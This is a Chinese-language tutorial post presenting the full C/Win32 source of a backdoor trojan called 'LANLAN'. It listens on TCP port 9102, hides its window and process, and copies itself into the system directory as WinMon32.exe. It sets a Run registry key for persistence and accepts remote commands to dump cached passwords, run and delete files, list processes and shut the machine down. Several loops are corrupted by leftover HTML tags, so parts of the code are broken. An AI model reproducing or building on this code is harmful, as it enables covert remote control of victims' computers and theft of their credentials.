一个简单木马程序的编写

一个简单木马例子
写文章一般都赋源代码.除关键部分外向来不爱打太多说明性文字,因为觉得这样
才比较实际,关于那些函数用法和功能大可以去翻书,哪里讲的比谁都详细.

这里给了一个用异步SOCKET方式, 直接调用WINSOCK API,WIN SDK写的木马(VC,C++ BUILDER下均编译,调试通过),无须客户端,编译后才几十K.实现了些 主要功能,文件浏览,上传,下载(均支持统配符),改变目录,获取系统信息,从CACHE取密码, 执行文件,显示进程, 发送消息,关机, 还有些控制功能, WIN 9X,NT/2000下均 可使用,在NT,2000下,因考虑到如CMD.EXE已改名或不存在,那么程序 将毫无用处. 所以 并没有调用CMD.EXE来完成,全部由自己来做,WIN API实现.要想自己程序通用就不要怕 麻烦.建议那些用现成控件写木马和网络通讯的朋友应该看看,去熟悉这些根本所在, 尤其是在网络 通讯方面.如果你是个程序员 我想大可不必用我多说,在开发中还没见过哪家公司让 用现成类 (MFC,VCL)来做的.

此程序还不很健壮,写完后也没来的及优化,主要是拿来让大家熟悉一下WINSOCK和WIN SDK编程.

//---------------------------------------------------------------------------
// WINSOCK API,WIN SDK编程,无需客户端
//
// 作者: 贾佳
//---------------------------------------------------------------------------

#include <windows.h><br>#include <winsock.h><br>#include <mmsystem.h><br>#pragma hdrstop <br>#include <condefs.h><br>#pragma argsused </condefs.h></mmsystem.h></winsock.h></windows.h>

#define RUN "\\WinMon32.exe"

//注册服务
#define SERVICE_PROC 1
//卸载服务
#define UNSERVICE_PROC 0

#define TH32CS_SNAPPROCESS 0x00000002
#define PROCESS_HANDLE_NAME 255

//缓冲区长度
#define dwBuffSize 2048
//命令行长度
#define dwComm 50
#define PORT 9102
#define WM_SOCKET WM_USER+1
#define PROMPT "LanLan:\\>"

DWORD dwVersion=MAKEWORD(1,1);
DWORD dwFlag=TRUE;
WSADATA wsaData;
SOCKET CreateSock,NewSock;
SOCKADDR_IN Sock_in,NewSock_in;
LPTSTR szReadBuff,Ob,TempBuff;
int addrlen;

//CACHE PASSWORD结构
typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry;
WORD cbResource;
WORD cbPassword;
BYTE iEntry;
BYTE nType;
char abResource[1];
} PASSWORD_CACHE_ENTRY;

typedef BOOL (WINAPI *CACHECALLBACK)(PASSWORD_CACHE_ENTRY *pce,DWORD);

//CACHE PASSWORD函数原形
typedef WORD (WINAPI *PWNetEnumCachedPasswords)(
LPSTR pbPrefix,
DWORD cbPrefix,
DWORD nType,
CACHECALLBACK pfnCallback,
DWORD UNKNOWN
);

//TOOLHELP32 结构
typedef struct tagPROCESSENTRY32
{
DWORD dwSize;
DWORD cntUsage;
DWORD th32ProcessID;
DWORD th32DefaultHeapID;
DWORD th32ModuleID;
DWORD cntThreads;
DWORD th32ParentProcessID;
LONG pcPriClassBase;
DWORD dwFlags;
TCHAR szExeFile[MAX_PATH];
} PROCESSENTRY32;

typedef PROCESSENTRY32 * LPPROCESSENTRY32;

//定义TOOLHELP32,PSAPI函数指针
HANDLE (WINAPI *CreateToolhelp32Snapshot)(DWORD dwFlags,DWORD th32PD);
BOOL (WINAPI *Process32First)(HANDLE hSnapshot,LPPROCESSENTRY32 pe);
BOOL (WINAPI *Process32Next)(HANDLE hSnapshot,LPPROCESSENTRY32 pe);
BOOL (WINAPI *EnumProcesses)(DWORD* lpidProcess,DWORD cb,DWORD *cbNeeded);
DWORD (WINAPI *GetModuleFileNameExA)(HANDLE hProcess,HMODULE hModule,LPTSTR lpstrFileName,DWORD nSize);

HINSTANCE DLLInst;
DWORD (WINAPI *RegisterServiceProcess)(DWORD, DWORD);

//---------------------------------------------------------------------------
// GetOS
// 判断操作系统
//---------------------------------------------------------------------------

DWORD WINAPI GetOS()
{
OSVERSIONINFO os;
TCHAR sVersion[MAX_PATH];

os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(&os);
switch(os.dwPlatformId)
{
case VER_PLATFORM_WIN32_WINDOWS:
return VER_PLATFORM_WIN32_WINDOWS;

case VER_PLATFORM_WIN32_NT:
return VER_PLATFORM_WIN32_NT;
}
}

//---------------------------------------------------------------------------
// HideProc
// 注册进程
//---------------------------------------------------------------------------

BOOL WINAPI HideProc(int mode)
{
DLLInst=LoadLibrary("KERNEL32.DLL");
if(DLLInst)
{
RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD))
GetProcAddress(DLLInst,"RegisterServiceProcess");
if(RegisterServiceProcess)
{
RegisterServiceProcess(GetCurrentProcessId(),mode);
return TRUE;
}
else
return FALSE;
}
else return FALSE;
}

//---------------------------------------------------------------------------
// EnumProcess
// 枚举进程
//---------------------------------------------------------------------------

//初始化TOOLHELP32
BOOL InitToolHelp32()
{
HINSTANCE DLLinst=LoadLibrary("KERNEL32.DLL");
if(DLLinst)
{
CreateToolhelp32Snapshot=(HANDLE(WINAPI *)(DWORD dwFlags,DWORD th32PD))
GetProcAddress(DLLinst,"CreateToolhelp32Snapshot");
Process32First=(BOOL(WINAPI *)(HANDLE hSnapshot,LPPROCESSENTRY32 pe))
GetProcAddress(DLLinst,"Process32First");
Process32Next=(BOOL(WINAPI *)(HANDLE hSnapshot,LPPROCESSENTRY32 pe))
GetProcAddress(DLLinst,"Process32Next");
if((!(UINT)CreateToolhelp32Snapshot)||(!(UINT)Process32First)||(!(UINT)Process32Next))
return FALSE;
else
return TRUE;
}
return FALSE;
}

//初始化PSAPI
BOOL InitPSAPI()
{
HINSTANCE PSAPI=LoadLibrary("PSAPI.DLL");
if(NULL==PSAPI)
return FALSE;
EnumProcesses=(BOOL(WINAPI *)(DWORD* lpidProcess,DWORD cb,DWORD *cbNeeded))
GetProcAddress(PSAPI,"EnumProcesses");
GetModuleFileNameExA=(DWORD(WINAPI *)(HANDLE hProcess,HMODULE hModule,LPTSTR lpstrFileName,DWORD nSize))
GetProcAddress(PSAPI,"GetModuleFileNameExA");
if(NULL == EnumProcesses||NULL == GetModuleFileName)
return FALSE;
else
return TRUE;
}

VOID WINAPI EnumProcess()
{
HANDLE process[255];
PROCESSENTRY32 p32;
DWORD process_ids[255];
DWORD num_processes;
TCHAR file_name[MAX_PATH];
TCHAR szTemp[MAX_PATH];
unsigned i;

wsprintf(szTemp,"\n\n\r << Process File Name >>\n\n\r");
send(NewSock,szTemp,lstrlen(szTemp),0);

switch(GetOS())
{
case VER_PLATFORM_WIN32_WINDOWS:
if(InitToolHelp32())
{
p32.dwSize=sizeof(PROCESSENTRY32);
HANDLE pName=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
BOOL Next=Process32First(pName,&p32);
i=0;
while(Next)
{
wsprintf(szTemp,"Process FileName :%s \n\r",p32.szExeFile);
send(NewSock,szTemp,lstrlen(szTemp),0);
process=OpenProcess(PROCESS_TERMINATE,0,p32.th32ProcessID);
Next=Process32Next(pName,&p32);
i++;
}
CloseHandle(pName);
}
break;

case VER_PLATFORM_WIN32_NT:
if(InitPSAPI())
{
EnumProcesses(process_ids,sizeof(process_ids),&num_processes);
for(i=0; i<num_processes i>{ <br>process=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ <br>,0,process_ids); <br>if(GetModuleFileNameExA(process,NULL,file_name,sizeof(file_name))) <br>wsprintf(szTemp,"Process FileName :%s \n\r",file_name); <br>send(NewSock,szTemp,lstrlen(szTemp),0); <br>} <br>CloseHandle(process); <br>} <br>break; <br>} </num_processes>

}

//---------------------------------------------------------------------------
// GetCachePW
// 取CACHE密码
//---------------------------------------------------------------------------

BOOL CALLBACK GetPass(PASSWORD_CACHE_ENTRY *pce,DWORD)
{
MoveMemory(szReadBuff,pce->abResource,pce->cbResource);
szReadBuff[pce->cbResource]=0;
CharToOem(szReadBuff,Ob);
wsprintf(TempBuff,"\n\n\r (USERNAME): %s \n\r (PASSWORD): ",Ob);
MoveMemory(szReadBuff,pce->abResource+pce->cbResource,pce->cbPassword);
szReadBuff[pce->cbPassword]=0;
CharToOem(szReadBuff,Ob);
lstrcat(TempBuff,Ob);
send(NewSock,TempBuff,dwBuffSize,0);

return TRUE;
}

BOOL WINAPI GetCachePW()
{
TCHAR szTemp[MAX_PATH];

PWNetEnumCachedPasswords WNetEnumCachedPasswords;
HINSTANCE DLLinst=LoadLibrary("MPR.DLL");
if(!DLLinst)
{
return FALSE;
}

wsprintf(szTemp,"\n\n\r << Win 9x Cache Password >>\n\r");
send(NewSock,szTemp,lstrlen(szTemp),0);

WNetEnumCachedPasswords=(PWNetEnumCachedPasswords)
GetProcAddress(DLLinst,"WNetEnumCachedPasswords");
if(!WNetEnumCachedPasswords)
{
return FALSE;
}
else
{
szReadBuff=(LPTSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,dwBuffSize);
Ob=(LPTSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,dwBuffSize);
TempBuff=(LPTSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,dwBuffSize);
WNetEnumCachedPasswords(0,0,0xff,GetPass,0);
HeapFree(GetProcessHeap(),dwBuffSize,szReadBuff);
HeapFree(GetProcessHeap(),dwBuffSize,Ob);
HeapFree(GetProcessHeap(),dwBuffSize,TempBuff);
FreeLibrary(DLLinst);
}
return TRUE;
}

//---------------------------------------------------------------------------
// LoadProcess
// 执行文件
//---------------------------------------------------------------------------

BOOL WINAPI LoadProcess(LPCTSTR szFileName)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;

ZeroMemory(&si,sizeof(STARTUPINFO));
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
si.cb=sizeof(STARTUPINFO);
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=SW_SHOWNORMAL;

if(CreateProcess(szFileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi)==FALSE)
{
return FALSE;
}
return TRUE;
}

//---------------------------------------------------------------------------
// Dir
// 浏览文件,支持统配符
//---------------------------------------------------------------------------

VOID WINAPI Dir(LPCTSTR lParam)
{
WIN32_FIND_DATA wfd;
HANDLE hHandle;
TCHAR szFileName[MAX_PATH];
int i;

wsprintf(szFileName,"\n\n\r");
send(NewSock,szFileName,lstrlen(szFileName),0);

lstrcpy(szFileName,lParam);

if((hHandle=FindFirstFile(szFileName,&wfd))!=INVALID_HANDLE_VALUE)
{
do
{
switch(wfd.dwFileAttributes)
{
case FILE_ATTRIBUTE_ARCHIVE:
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
break;
case FILE_ATTRIBUTE_DIRECTORY:
wsprintf(szFileName,"%-20s %10lu

\n\r",wfd.cFileName,wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
break;
case FILE_ATTRIBUTE_HIDDEN:
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
break;
case FILE_ATTRIBUTE_READONLY:
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
break;
case FILE_ATTRIBUTE_SYSTEM:
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
break;
}
}while(FindNextFile(hHandle,&wfd));
}
else
{
wsprintf(szFileName,"Can not find directory or files.\n\r");
send(NewSock,szFileName,lstrlen(szFileName),0);
}
}

//---------------------------------------------------------------------------
// FileOpertion
// 文件操作函数
//---------------------------------------------------------------------------

BOOL WINAPI FileOpertion(LPCTSTR szFileName1,LPCTSTR szFileName2,DWORD opt)
{
SHFILEOPSTRUCT shf;
TCHAR sr[MAX_PATH];
TCHAR de[MAX_PATH];

lstrcpy(sr,szFileName1);
sr[lstrlen(sr)+1]=‘\0‘;
lstrcpy(de,szFileName2);
de[lstrlen(de)+1]=‘\0‘;

ZeroMemory(&shf,sizeof(shf));
shf.hwnd=NULL;
shf.wFunc=opt;
shf.pFrom=sr;
shf.pTo=de;
shf.fFlags=FOF_ALLOWUNDO|FOF_SILENT|FOF_FILESONLY|FOF_MULTIDESTFILES
|FOF_NOCONFIRMATION|FOF_NOCONFIRMMKDIR;

if(SHFileOperation(&shf))
return FALSE;
else
return TRUE;
}

//---------------------------------------------------------------------------
// Delete
// 删除文件(隐藏,只读),目录,支持统配符
//---------------------------------------------------------------------------

VOID WINAPI Delete(LPCTSTR lParam)
{
if(!FileOpertion(lParam,"",FO_DELETE))
send(NewSock,"Delete File is Fail",20,0);
else
send(NewSock,"Delete File is OK",17,0);
}

//---------------------------------------------------------------------------
// Copy
// 复制,上传,下载文件(需先将自己硬盘设置为完全共享),支持统配符
//---------------------------------------------------------------------------

VOID WINAPI Copy(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_COPY))
send(NewSock,"Copy File is Fail",18,0);
else
send(NewSock,"Copy File is OK",15,0);
}

//---------------------------------------------------------------------------
// Ren
// 文件,目录重命名
//---------------------------------------------------------------------------

VOID WINAPI Ren(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_RENAME))
send(NewSock,"Renname File is Fail",21,0);
else
send(NewSock,"Reanme File is OK",18,0);
}

//---------------------------------------------------------------------------
// GetSysInfo
// 获取系统信息
//---------------------------------------------------------------------------

VOID WINAPI GetSysInfo()
{
TCHAR szBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];

wsprintf(szBuff,"\n\n\r<<system information>&gt;\n\n\r"); <br>send(NewSock,szBuff,lstrlen(szBuff),0); </system>

//计算机名
DWORD len=sizeof(szTemp);
GetComputerName(szTemp,&len);
wsprintf(szBuff,"Computer Name: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);

//当前操作系统
switch(GetOS())
{
case VER_PLATFORM_WIN32_WINDOWS:
lstrcpy(szTemp,"Windows 9x");
break;
case VER_PLATFORM_WIN32_NT:
lstrcpy(szTemp,"Windows NT/2000");
break;
}
wsprintf(szBuff,"Option System: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);

//内存容量
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
wsprintf(szBuff,"Total Memroy: %dM\n\n\r",mem.dwTotalPhys/1024/1024+1);
send(NewSock,szBuff,lstrlen(szBuff),0);

//系统目录
TCHAR szPath[MAX_PATH];
GetWindowsDirectory(szTemp,sizeof(szTemp));
GetSystemDirectory(szBuff,sizeof(szBuff));
wsprintf(szPath,"Windows Directory: %s\n\n\rSystem Directory: %s\n\n\r",szTemp,szBuff);
send(NewSock,szPath,lstrlen(szPath),0);

//驱动器及分区类型
TCHAR szFileSys[10];

for(int i=0;i<26;++i)
{
wsprintf(szTemp,"%c:\\",‘A‘+i);
UINT uType=GetDriveType(szTemp);
switch(uType)
{
case DRIVE_FIXED:
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH);
wsprintf(szBuff,"Hard Disk: %s (%s)\n\n\r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_CDROM:
wsprintf(szBuff,"CD-ROM Disk: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_REMOTE:
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH);
wsprintf(szBuff,"NetWork Disk: %s (%s)\n\n\r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
}
}

}

//---------------------------------------------------------------------------
// ExitWin
// 关闭计算机(WIN 9X,NT/2000)
//---------------------------------------------------------------------------

VOID WINAPI ExitWin()
{
DWORD dwVer;
HANDLE hProcess, hToken;
TOKEN_PRIVILEGES NewState;
DWORD ProcessId, ReturnLength = 0;
LUID luidPrivilegeLUID;

dwVer=GetOS();
if(dwVer==VER_PLATFORM_WIN32_WINDOWS)
ExitWindowsEx(1,0);

else if(dwVer==VER_PLATFORM_WIN32_NT)
{
ProcessId = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES, &hToken);
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID);

NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
ExitWindowsEx(EWX_FORCE|EWX_POWEROFF,0);
}
}

//---------------------------------------------------------------------------
// CtrlCD
// 光驱控制
//---------------------------------------------------------------------------

VOID WINAPI CtrlCD(HWND hWnd,BOOL Ctrl)
{
switch(Ctrl)
{
case TRUE:
mciSendString("Set cdaudio door open wait",NULL,0,hWnd);
break;
case FALSE:
mciSendString("Set cdaudio door closed wait",NULL,0,hWnd);
break;
}
}

//---------------------------------------------------------------------------
// PopMsg
// 发送消息
//---------------------------------------------------------------------------

VOID WINAPI PopMsg(LPCTSTR message,HWND hWnd)
{
MessageBox(hWnd,message,"PopMsg",MB_OK);
}

//---------------------------------------------------------------------------
// ChangeDir
// 改变当前目录
//---------------------------------------------------------------------------

BOOL WINAPI ChangeDir(LPCTSTR szDir)
{
if(SetCurrentDirectory(szDir))
return TRUE;
else
return FALSE;
}

//---------------------------------------------------------------------------
// GetCurPath
// 得到当前目录
//---------------------------------------------------------------------------

VOID WINAPI GetCurPath()
{
TCHAR lpBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];

GetCurrentDirectory(MAX_PATH,lpBuff);
wsprintf(szTemp,"CurrentDirect: %s\n\r",lpBuff);
send(NewSock,szTemp,lstrlen(szTemp),0);
}

//---------------------------------------------------------------------------
// HSSys
// 显示,隐藏桌面,任务栏
//---------------------------------------------------------------------------

VOID WINAPI HSSys(HWND hWnd,BOOL Ctrl)
{
switch(Ctrl)
{
case FALSE:
hWnd=FindWindow("Progman",NULL);
ShowWindow(hWnd,SW_HIDE);
hWnd=FindWindow("Sh*ll _TrayWnd",NULL);
ShowWindow(hWnd,SW_HIDE);
break;
case TRUE:
hWnd=FindWindow("Progman",NULL);
ShowWindow(hWnd,SW_SHOW);
hWnd=FindWindow("Sh*ll _TrayWnd",NULL);
ShowWindow(hWnd,SW_SHOW);
break;
}
}

//---------------------------------------------------------------------------
// LockMK
// 锁定鼠标,功能键
//---------------------------------------------------------------------------

VOID WINAPI LockMK(BOOL Ctrl)
{
RECT rc;
switch(Ctrl)
{
case TRUE:
ZeroMemory(&rc,sizeof(rc));
ClipCursor(&rc);
SystemParametersInfo(SPI_SCREENSAVERRUNNING,TRUE,NULL,0);
SystemParametersInfo(SPI_SETFASTTASKSWITCH,TRUE,NULL,0);
break;
case FALSE:
ClipCursor(NULL);
SystemParametersInfo(SPI_SCREENSAVERRUNNING,FALSE,NULL,0);
SystemParametersInfo(SPI_SETFASTTASKSWITCH,FALSE,NULL,0);
break;
}
}

//---------------------------------------------------------------------------
// ExeCommand
// 执行命令
//---------------------------------------------------------------------------

VOID ExeCommand(LPCTSTR szCommand,HWND hWnd)
{
TCHAR szBuf[MAX_PATH];
TCHAR Param1[100];
TCHAR Param2[100];
int i;

if((lstrcmp(szCommand,"getpw"))==0)
GetCachePW();

else if((lstrcmp(szCommand,"getinfo"))==0)
GetSysInfo();

else if((lstrcmp(szCommand,"gcpath"))==0)
GetCurPath();

else if((lstrcmp(szCommand,"opencd"))==0)
CtrlCD(hWnd,TRUE);

else if((lstrcmp(szCommand,"closecd"))==0)
CtrlCD(hWnd,FALSE);

else if((lstrcmp(szCommand,"showsys"))==0)
HSSys(hWnd,TRUE);

else if((lstrcmp(szCommand,"hidesys"))==0)
HSSys(hWnd,FALSE);

else if((lstrcmp(szCommand,"lockmk"))==0)
LockMK(TRUE);

else if((lstrcmp(szCommand,"unlock"))==0)
LockMK(FALSE);

else if((lstrcmp(szCommand,"dproc"))==0)
EnumProcess();

else if((lstrcmp(szCommand,"exitwin"))==0)
ExitWin();

else if((strncmp(szCommand,"popmsg",lstrlen("popmsg")))==0)
{
if(lstrlen(szCommand)<=lstrlen("popmsg")+2)
{
send(NewSock,"usage : popmsg Message",28,0);
}
for(i=lstrlen("popmsg")+1;i<lstrlen>if(szCommand==‘ ‘)break; <br>if(i==lstrlen(szCommand)) <br>{ <br>lstrcpy(Param1,szCommand+lstrlen("popmsg")+1); <br>PopMsg(Param1,hWnd); <br>} <br>} </lstrlen>

else if((strncmp(szCommand,"execfile",lstrlen("execfile")))==0)
{
if(lstrlen(szCommand)<=lstrlen("execfile")+2)
{
send(NewSock,"usage : execfile szFileName",28,0);
}
for(i=lstrlen("execfile")+1;i<lstrlen>if(szCommand==‘ ‘)break; <br>if(i==lstrlen(szCommand)) <br>{ <br>lstrcpy(Param1,szCommand+lstrlen("execfile")+1); <br>if(LoadProcess(Param1)==FALSE) <br>send(NewSock,"execfile Fail",14,0); <br>else <br>send(NewSock,"execfile OK",11,0); <br>} <br>} </lstrlen>

else if((strncmp(szCommand,"cd",lstrlen("cd")))==0)
{
if(lstrlen(szCommand)<=lstrlen("cd")+2)
{
send(NewSock,"cd Drive\\Directory",19,0);
}
for(i=lstrlen("cd")+1;i<lstrlen>if(szCommand==‘ ‘)break; <br>if(i==lstrlen(szCommand)) <br>{ <br>lstrcpy(Param1,szCommand+lstrlen("cd")+1); <br>if(ChangeDir(Param1)==FALSE) <br>send(NewSock,"Change Directory Fail",21,0); <br>else <br>send(NewSock,"Change Directory OK",19,0); <br>} <br>} </lstrlen>

else if((strncmp(szCommand,"dir",lstrlen("dir")))==0)
{
if(lstrlen(szCommand)<=lstrlen("dir")+2)
{
Dir("*.*");
}
for(i=lstrlen("dir")+1;i<lstrlen>if(szCommand==‘ ‘)break; <br>if(i==lstrlen(szCommand)) <br>{ <br>lstrcpy(Param1,szCommand+lstrlen("dir")+1); <br>Dir(Param1); <br>} <br>} </lstrlen>

else if((strncmp(szCommand,"del",lstrlen("del")))==0)
{
if(lstrlen(szCommand)<=lstrlen("del")+2)
{
send(NewSock,"usage : DEL szFileName",28,0);
}
for(i=lstrlen("del")+1;i<lstrlen>if(szCommand==‘ ‘)break; <br>if(i==lstrlen(szCommand)) <br>{ <br>lstrcpy(Param1,szCommand+lstrlen("del")+1); <br>Delete(Param1); <br>} <br>} </lstrlen>

else if((strncmp(szCommand,"copy",lstrlen("copy")))==0)
{
if(lstrlen(szCommand)<=lstrlen("COPY")+2)
{
send(NewSock,"usage : COPY Drive\\Filename ",28,0);
return;
}
for(i=lstrlen("copy")+1;i<lstrlen>if(szCommand==‘ ‘)break; <br>if(i==lstrlen(szCommand)) <br>{ <br>lstrcpy(Param1,szCommand+lstrlen("copy")+1); <br>lstrcpy(Param2,""); <br>send(NewSock,"Copy File1 to File2",19,0); <br>} <br>else <br>{ <br>lstrcpy(szBuf,szCommand); <br>szBuf=0; <br>lstrcpy(Param1,szBuf+lstrlen("copy")+1); <br>lstrcpy(Param2,szBuf+i+1); <br>Copy(Param1,Param2); <br>} <br>} </lstrlen>

else if((strncmp(szCommand,"ren",lstrlen("ren")))==0)
{
if(lstrlen(szCommand)<=lstrlen("ren")+2)
{
send(NewSock,"usage : REN Drive\\Filename ",28,0);
return;
}
for(i=lstrlen("ren")+1;i<lstrlen>if(szCommand==‘ ‘)break; <br>if(i==lstrlen(szCommand)) <br>{ <br>lstrcpy(Param1,szCommand+lstrlen("ren")+1); <br>lstrcpy(Param2,""); <br>send(NewSock,"Ren File1 to File2",19,0); <br>} <br>else <br>{ <br>lstrcpy(szBuf,szCommand); <br>szBuf=0; <br>lstrcpy(Param1,szBuf+lstrlen("ren")+1); <br>lstrcpy(Param2,szBuf+i+1); <br>Ren(Param1,Param2); <br>} <br>} </lstrlen>

else
send(NewSock,"Bad Command !!!",16,0);
}

//---------------------------------------------------------------------------
// InitSocket
// 初始化SOCKET
//--------------------------------------------------------------------------

BOOL WINAPI InitSocket(HWND hWnd)
{
if((WSAStartup(dwVersion,&wsaData))!=0)
{
MessageBox(hWnd,"INIT SOCKET ERROR",NULL,MB_OK);
return FALSE;
}

CreateSock=socket(AF_INET,SOCK_STREAM,0);
if(CreateSock==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"SOCKET ERROR",NULL,MB_OK);
return FALSE;
}

Sock_in.sin_family=AF_INET;
Sock_in.sin_port=htons(PORT);
Sock_in.sin_addr.S_un.S_addr=htonl(INADDR_ANY);

setsockopt(CreateSock,SOL_SOCKET,SO_REUSEADDR,(LPSTR)&dwFlag,sizeof(dwFlag));

if(bind(CreateSock,(LPSOCKADDR)&Sock_in,sizeof(Sock_in))==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"BIND ERROR",NULL,MB_OK);
return FALSE;
}

else if(listen(CreateSock,3)==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"LISTEN ERROR",NULL,MB_OK);
return FALSE;
}

else if(WSAAsyncSelect(CreateSock,hWnd,WM_SOCKET,FD_ACCEPT|FD_CLOSE)==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"WSASelect ERROR",NULL,MB_OK);
return FALSE;
}

addrlen=sizeof(SOCKADDR_IN);

return TRUE;
}

//---------------------------------------------------------------------------

LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{

static TCHAR szCommand[dwComm];
static TCHAR szExec[dwComm];

switch(message)
{
case WM_SOCKET:
if(WSAGETSELECTERROR(lParam))
{
closesocket(wParam);
break;
}

switch(WSAGETSELECTEVENT(lParam))
{
//连接
case FD_ACCEPT:
NewSock=accept(CreateSock,(LPSOCKADDR)&NewSock_in,&addrlen);
WSAAsyncSelect(NewSock,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE);
wsprintf(szCommand,"LANLAN Ver 1.0 Write by VIRUS\n\n\r%s",PROMPT);
send(NewSock,szCommand,dwComm,0);
break;

//读取输入，如是回车则执行命令
//不是将输入复制到缓冲区
case FD_READ:
ZeroMemory(szCommand,dwComm);
recv(NewSock,szCommand,dwComm,0);
if(szCommand[0]==VK_RETURN)
{
wsprintf(szCommand,"\n\n\r%s",PROMPT);
send(NewSock,szCommand,dwComm,0);
ExeCommand(szExec,hWnd);
ZeroMemory(szExec,dwComm);
}
else
lstrcat(szExec,szCommand);
send(NewSock,szCommand,dwComm,0);
break;

case FD_CLOSE:
closesocket(wParam);
break;
}
break;

case WM_DESTROY:
HideProc(UNSERVICE_PROC);
PostQuitMessage(0);
break;

default:
return DefWindowProc(hWnd,message,wParam,lParam);

}
return 0;
}

//---------------------------------------------------------------------------

WINAPI WinMain(HINSTANCE hInstance, HINSTANCE, LPSTR, int)
{
HWND hWnd;
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="LANLAN";
HKEY hKey=0;
DWORD disp=0;
LONG lResult;
TCHAR szKey[MAX_PATH];
TCHAR szSysDir[MAX_PATH+25];
TCHAR szFileName[MAX_PATH];

wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=hInstance;
wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
wndc.hCursor=LoadCursor(NULL,IDC_ARROW);
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);

hWnd=CreateWindow(szAppName,"LANLANServer",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,hInstance,NULL);

ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);
if(GetOS()==VER_PLATFORM_WIN32_WINDOWS)
{
HideProc(SERVICE_PROC);
}
InitSocket(hWnd);

//复制文件到系统目录
//并加载注册表,自动运行

GetSystemDirectory(szSysDir,MAX_PATH);
lstrcat(szSysDir,RUN);
GetModuleFileName(NULL,szFileName,MAX_PATH);
CopyFile(szFileName,szSysDir,FALSE);

lstrcpy(szKey,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
lResult=RegCreateKeyEx(HKEY_LOCAL_MACHINE,szKey,0,NULL,REG_OPTION_VOLATILE,
KEY_ALL_ACCESS,NULL,&hKey,&disp);

if(lResult==ERROR_SUCCESS)
{
lResult=RegSetValueEx(hKey,"WinMon32",0,REG_SZ,szSysDir,lstrlen(szSysDir));
RegCloseKey(hKey);
}

while(GetMessage(&msg,NULL,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}

return (msg.wParam);
}